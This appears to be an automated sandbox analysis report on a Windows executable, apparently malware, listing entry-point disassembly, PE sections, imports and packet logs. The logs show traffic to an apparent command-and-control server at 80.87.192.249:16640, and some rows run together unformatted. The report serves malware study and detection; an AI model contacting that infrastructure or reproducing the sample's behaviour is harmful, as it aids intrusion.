                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        int3
                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        push FFFFFFFEh
                                                                                                                                                                                        push 004244A8h
                                                                                                                                                                                        push 00404ED0h
                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        add esp, FFFFFF94h
                                                                                                                                                                                        push ebx
                                                                                                                                                                                        push esi
                                                                                                                                                                                        push edi
                                                                                                                                                                                        mov eax, dword ptr [004261B4h]
                                                                                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                        push eax
                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                        push eax
                                                                                                                                                                                        call dword ptr [0041D068h]
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                        jmp 00007F24307DEAE8h
                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                        ret
                                                                                                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                        jmp 00007F24307DEC18h
                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F24307DEC54h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007F24307E6B5Ah
add esp, 04h
test eax, eax
jne 00007F24307DEACCh
push 0000001Ch
call 00007F24307DEC0Ch
add esp, 04h
call 00007F24307E2024h
test eax, eax
jne 00007F24307DEACCh
push 00000010h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [LNK] VS2008 build 21022
• [ASM] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24bd0 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x278f000 | 0x3f68 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x5f400 | 0x38a8 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2793000 | 0x18c4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1d230 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x24290 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x1d000 | 0x1e4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b960 | 0x1ba00 | False | 0.454927884615 | data | 6.27262317493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0x86cc | 0x8800 | False | 0.299431295956 | data | 4.74885052463 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x26000 | 0x276873c | 0x23800 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x278f000 | 0x3f68 | 0x4000 | False | 0.498046875 | data | 4.80279988584 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2793000 | 0x134d0 | 0x13600 | False | 0.0702620967742 | data | 0.910567807007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x2791908 | 0x130 | data | Polish | Poland
RT_ICON | 0x278f2d0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4293872191, next used block 4293543741 | English | United States
RT_STRING | 0x2791b88 | 0x198 | data | Polish | Poland
RT_STRING | 0x2791d20 | 0x6b2 | data | Polish | Poland
RT_STRING | 0x27923d8 | 0x6f6 | data | Polish | Poland
RT_STRING | 0x2792ad0 | 0x286 | data | Polish | Poland
RT_STRING | 0x2792d58 | 0x20e | data | Polish | Poland
RT_ACCELERATOR | 0x2791890 | 0x78 | data | Polish | Poland
RT_GROUP_CURSOR | 0x2791a38 | 0x14 | data | Polish | Poland
RT_GROUP_ICON | 0x2791878 | 0x14 | data | English | United States
RT_VERSION | 0x2791a50 | 0x134 | data | Polish | Poland

Imports

DLL | Import
KERNEL32.dll | FindFirstChangeNotificationW, GetConsoleAliasExesLengthA, CallNamedPipeA, GetQueuedCompletionStatus, GetCommState, InterlockedDecrement, CancelWaitableTimer, UnlockFile, SetEvent, FreeEnvironmentStringsA, CreateNamedPipeW, GetNumberFormatA, ReadConsoleOutputA, GetCommandLineA, GetPrivateProfileIntA, GetSystemDirectoryW, HeapCreate, TerminateProcess, FileTimeToSystemTime, GetModuleFileNameW, lstrlenW, WritePrivateProfileStringW, GetPrivateProfileIntW, InterlockedExchange, GetStartupInfoA, FreeLibraryAndExitThread, GetLastError, SetThreadContext, GetProcAddress, SetStdHandle, EnterCriticalSection, LoadLibraryA, OpenMutexA, CreateSemaphoreW, LocalAlloc, GetProfileStringA, SetThreadIdealProcessor, HeapWalk, FindAtomA, GlobalWire, GetModuleHandleA, FreeEnvironmentStringsW, FindNextFileW, WriteProfileStringW, GetCurrentDirectoryA, GetCPInfoExA, SetFileShortNameA, TlsAlloc, EnumResourceLanguagesW, GetSystemTime, LCMapStringW, CopyFileExA, DeleteFileA, GetVolumeInformationW, GetThreadLocale, GetFileSize, MoveFileA, HeapValidate, IsBadReadPtr, RaiseException, GetModuleHandleW, Sleep, InterlockedIncrement, ExitProcess, TlsGetValue, TlsSetValue, GetCurrentThreadId, TlsFree, SetLastError, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleFileNameA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapFree, VirtualFree, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, CreateFileA, CloseHandle, FlushFileBuffers
ADVAPI32.dll | InitiateSystemShutdownA

Version Infos

Description | Data
Translation | 0x1209 0x04b8

Possible Origin

Language of compilation system | Country where language is spoken | Map
Polish | Poland | -
English | United States | -

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                        Sep 25, 2021 10:17:18.042984962 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.099625111 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.148056984 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.219296932 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.276297092 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.277338982 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.334252119 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.335941076 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.400064945 CEST166404973780.87.192.249192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.444924116 CEST4973716640192.168.2.680.87.192.249
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603833914 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603883982 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:18.603993893 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.604779959 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:18.604810953 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.058501005 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.058618069 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062360048 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062386990 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.062704086 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.065613985 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.111149073 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.230475903 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.273114920 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379013062 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379031897 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379050016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379095078 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379147053 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379180908 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379196882 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379215002 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379225016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379234076 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379241943 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379256964 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379277945 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379288912 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379297972 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379319906 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379359007 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.379367113 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.429384947 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528727055 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528743029 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528762102 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528800964 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528822899 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528837919 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528856039 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.528949022 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529210091 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529220104 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529237032 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529253960 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529273033 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529285908 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529289007 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529342890 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529694080 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529702902 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529771090 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529791117 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529897928 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529964924 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529977083 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.529989004 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.570008993 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678035975 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678051949 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678071022 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678107977 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678134918 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678144932 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678247929 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678248882 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678256989 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678277016 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678284883 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678287983 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678318024 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678335905 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678347111 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678394079 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678431034 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678563118 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678572893 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678596973 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678617954 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678627968 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678637028 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678679943 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678688049 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678713083 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678858995 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678881884 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678910971 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678952932 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678961039 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.678997993 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679169893 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679193020 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679236889 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679253101 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679320097 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679455042 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679481030 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679527044 CEST4434974152.219.104.152192.168.2.6
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679529905 CEST49741443192.168.2.652.219.104.152
                                                                                                                                                                                        Sep 25, 2021 10:17:19.679541111 CEST4434974152.219.104.152192.168.2.6
Sep 25, 2021 10:17:19.679579020 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.679620981 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.679724932 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.679749012 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.679795027 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.679796934 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.679806948 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.679830074 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.679857969 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.680695057 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.681869984 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.827614069 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827649117 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827723980 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827780008 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827811003 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.827853918 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827873945 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.827925920 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.827933073 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827970028 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.827994108 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828035116 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828047037 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828089952 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828202963 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828227997 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828270912 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828280926 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828310013 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828414917 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828444004 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828483105 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828490973 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828511953 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828540087 CEST | 443 | 49741 | 52.219.104.152 | 192.168.2.6
Sep 25, 2021 10:17:19.828548908 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.828586102 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.830236912 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:19.839713097 CEST | 49741 | 443 | 192.168.2.6 | 52.219.104.152
Sep 25, 2021 10:17:20.840604067 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:20.841377974 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:20.937177896 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:20.981806040 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.076931953 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.098222017 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.148591042 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.313342094 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.369980097 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.370012045 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.370170116 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.445821047 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.502923012 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.511142969 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:21.569595098 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:21.617070913 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:22.283147097 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249
Sep 25, 2021 10:17:22.381196022 CEST | 16640 | 49737 | 80.87.192.249 | 192.168.2.6
Sep 25, 2021 10:17:22.614346981 CEST | 49737 | 16640 | 192.168.2.6 | 80.87.192.249

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2021 10:16:35.244121075 CEST | 62044 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:16:35.271393061 CEST | 53 | 62044 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:07.094274044 CEST | 63791 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:07.114228964 CEST | 53 | 63791 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:09.548855066 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:09.569423914 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:09.582917929 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:09.602706909 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:18.551632881 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:18.573545933 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:18.582453966 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:18.602396011 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:27.993978977 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:28.013684034 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:28.635018110 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:28.656613111 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:29.532562971 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:29.552484989 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:30.216706991 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:30.236444950 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:31.015336037 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:31.035273075 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:31.990437031 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:32.025130987 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:32.233239889 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:32.252932072 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:33.022066116 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:33.041932106 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:33.860085964 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:33.879784107 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:34.652348042 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Sep 25, 2021 10:17:34.672307014 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Sep 25, 2021 10:17:35.126029015 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
